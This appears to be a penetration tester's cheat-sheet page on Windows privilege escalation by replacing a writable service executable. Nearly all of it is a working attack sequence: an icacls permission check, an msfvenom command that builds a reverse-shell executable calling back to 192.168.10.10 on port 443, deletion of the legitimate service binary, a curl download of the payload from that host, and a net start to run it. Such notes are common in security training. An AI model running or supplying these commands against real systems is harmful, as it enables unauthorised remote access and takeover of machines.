githubEdit

Modifiable Service File

β€’ Permission check and service stop / start check

β€’ Msfvenom create shell and upload ( curl, iwr, certutil)

β€’ icacls "C:\Program Files"

β€’ msfvenom -p windows/shell_reverse_tcp lhost=192.168.10.10 lport=443 -f exe -o rev.exe

β€’ del "C:\program files\noman\noman.exe"

β€’ curl 192.168.10.10/rev.exe -o noman.exe

β€’ cp noman.exe "C:\program files\noman\"

β€’ net start noman

Last updated